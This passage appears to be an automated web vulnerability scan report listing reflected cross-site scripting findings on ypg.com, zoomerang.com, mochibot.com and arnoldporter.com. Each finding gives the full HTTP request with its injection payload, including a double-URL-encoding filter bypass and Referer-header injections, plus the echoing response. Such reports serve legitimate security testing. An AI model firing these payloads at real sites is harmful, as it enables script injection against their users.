Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:27:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en96651--><img src=a onerror=alert(1)>14a5bb298df)
        </p>
...[SNIP]...
4.180. http://www.ypg.com/en/images/loading.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload ceec2--><script>alert(1)</script>f06c185198a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/imagesceec2--><script>alert(1)</script>f06c185198a/loading.gif HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:28:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(6) {
["lang"]=>
string(2) "en"
["url"]=>
string(63) "/imagesceec2--><script>alert(1)</script>f06c185198a/loading.gif"
[3]=>
...[SNIP]...
4.181. http://www.ypg.com/en/images/loading.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 4cdfc--><script>alert(1)</script>6c7aea9cdab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/images/loading.gif4cdfc--><script>alert(1)</script>6c7aea9cdab HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:28:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(6) {
["lang"]=>
string(2) "en"
["url"]=>
string(63) "/images/loading.gif4cdfc--><script>alert(1)</script>6c7aea9cdab"
[3]=>
...[SNIP]...
4.182. http://www.ypg.com/en/images/loading.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 89ae2--><script>alert(1)</script>0468e44a0a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/images/loading.gif?89ae2--><script>alert(1)</script>0468e44a0a9=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:23:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
rl"]=>
string(19) "/images/loading.gif"
[3]=>
string(18) "images/loading.gif"
["controller"]=>
string(5) "index"
["action"]=>
string(5) "index"
["module"]=>
string(9) "pagefront"
["89ae2--><script>alert(1)</script>0468e44a0a9"]=>
...[SNIP]...
4.183. http://www.ypg.com/images/imageresizer.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /images/imageresizer.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload eef14--><img%20src%3da%20onerror%3dalert(1)>926bd771afb was submitted in the REST URL parameter 1. This input was echoed as eef14--><img src=a onerror=alert(1)>926bd771afb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /imageseef14--><img%20src%3da%20onerror%3dalert(1)>926bd771afb/imageresizer.php?src=_var_data_gallery_photo_71_14_95_98_12_108.png&w=326&h=50&o=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:22:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (imageseef14--><img src=a onerror=alert(1)>926bd771afb)
        </p>
...[SNIP]...
4.184. http://www.ypg.com/images/imageresizer.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /images/imageresizer.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 6af35--><img%20src%3da%20onerror%3dalert(1)>3e1a5ad96ed was submitted in the REST URL parameter 2. This input was echoed as 6af35--><img src=a onerror=alert(1)>3e1a5ad96ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/imageresizer.php6af35--><img%20src%3da%20onerror%3dalert(1)>3e1a5ad96ed?src=_var_data_gallery_photo_71_14_95_98_12_108.png&w=326&h=50&o=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:24:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(7) {
["controller"]=>
string(6) "images"
["action"]=>
string(63) "imageresizer.php6af35--><img src=a onerror=alert(1)>3e1a5ad96ed"
["module"]=>
...[SNIP]...
4.185. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d418d--><img%20src%3da%20onerror%3dalert(1)>ffc954ffcee was submitted in the REST URL parameter 1. This input was echoed as d418d--><img src=a onerror=alert(1)>ffc954ffcee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modulesd418d--><img%20src%3da%20onerror%3dalert(1)>ffc954ffcee/core/front/images/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:23:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (modulesd418d--><img src=a onerror=alert(1)>ffc954ffcee)
        </p>
...[SNIP]...
4.186. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload f13c6--><img%20src%3da%20onerror%3dalert(1)>68e93f27964 was submitted in the REST URL parameter 2. This input was echoed as f13c6--><img src=a onerror=alert(1)>68e93f27964 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modules/coref13c6--><img%20src%3da%20onerror%3dalert(1)>68e93f27964/front/images/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:24:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(4) {
["controller"]=>
string(7) "modules"
["action"]=>
string(51) "coref13c6--><img src=a onerror=alert(1)>68e93f27964"
["front"]=>
...[SNIP]...
4.187. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 42cf2--><img%20src%3da%20onerror%3dalert(1)>4fde6733147 was submitted in the REST URL parameter 3. This input was echoed as 42cf2--><img src=a onerror=alert(1)>4fde6733147 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modules/core/front42cf2--><img%20src%3da%20onerror%3dalert(1)>4fde6733147/images/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:26:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(4) {
["controller"]=>
string(7) "modules"
["action"]=>
string(4) "core"
["front42cf2--><img src=a onerror=alert(1)>4fde6733147"]=>
...[SNIP]...
4.188. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload aeff6--><img%20src%3da%20onerror%3dalert(1)>052b8df489a was submitted in the REST URL parameter 4. This input was echoed as aeff6--><img src=a onerror=alert(1)>052b8df489a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modules/core/front/imagesaeff6--><img%20src%3da%20onerror%3dalert(1)>052b8df489a/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:27:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(4) {
["controller"]=>
string(7) "modules"
["action"]=>
string(4) "core"
["front"]=>
string(53) "imagesaeff6--><img src=a onerror=alert(1)>052b8df489a"
["module"]=>
...[SNIP]...
4.189. http://www.zoomerang.com/Survey/TinyMCE.ashx [font parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zoomerang.com
Path:   /Survey/TinyMCE.ashx

Issue detail

The value of the font request parameter is copied into the HTML document as plain text between tags. The payload e0de6%253cscript%253ealert%25281%2529%253c%252fscript%253ea64883a00d5 was submitted in the font parameter. This input was echoed as e0de6<script>alert(1)</script>a64883a00d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the font request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Survey/TinyMCE.ashx?module=StyleSheet&font=Arial+2+%23000001e0de6%253cscript%253ealert%25281%2529%253c%252fscript%253ea64883a00d5 HTTP/1.1
Host: www.zoomerang.com
Proxy-Connection: keep-alive
Referer: http://www.zoomerang.com/Survey/WEB22BZL8ZUMFQ/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerWDC-PROD-ZM-WWW-SURVEY_80-8086=1057781770.38431.0000

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 01:05:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: public
Expires: Mon, 18 Apr 2011 01:05:32 GMT
Content-Type: text/css; charset=UTF-8
Content-Length: 150

.mceContentBody, .DefaultFont, #DefaultFont {
font-family: Arial;
color: #000001e0de6<script>alert(1)</script>a64883a00d5;
font-size: small;
}
4.190. http://mochibot.com/my/core.swf [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mochibot.com
Path:   /my/core.swf

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 41fa5<script>alert(1)</script>2c341abede3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /my/core.swf?mv=8&fv=9&v=WIN%2010%2C2%2C154%2C25&swfid=f0d2fc3a&l=10301&f=_level0&sb=remote&t=1 HTTP/1.1
Host: mochibot.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=41fa5<script>alert(1)</script>2c341abede3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Mon, 18 Apr 2011 01:08:14 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 1696
Cache-Control: false
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-MochiAds-Server: 38.102.129.22:80
X-Mochi-Backend: 10.0.0.50:8890
X-Mochi-Source: 10.0.0.238:6754

FWS.....p...........D.....C....?.w.......*..........System...
..security.N...allowDomain.R.....this........W....REF..http://www.google.com/search?hl=en&q=41fa5<script>alert(1)</script>2c341abede3.O......sb..remote.O......f.._level0.O.    ....MV..8.O.    ....SV..9.O......TAG..f0d2fc3a.O....__mochibot.......mc.O.....mc.............createEmptyMovieClip.N....u..&.......lv.........createEmptyMovieClip.R.
...[SNIP]...
4.191. http://www.arnoldporter.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94298"><a>ab34203c0ec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=94298"><a>ab34203c0ec

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:06:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24313316;expires=Wed, 10-Apr-2041 01:06:54 GMT;path=/
Set-Cookie: CFTOKEN=10510270;expires=Wed, 10-Apr-2041 01:06:54 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=94298"><a>ab34203c0ec">
...[SNIP]...
4.192. http://www.arnoldporter.com/events.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /events.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f757"><a>b17ba21f5e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /events.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=8f757"><a>b17ba21f5e0

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:51:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Seminars/Events</title>
       <meta name="Description"
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=8f757"><a>b17ba21f5e0">
...[SNIP]...
4.193. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /experience.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b23d"><a>17b8f11a572 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

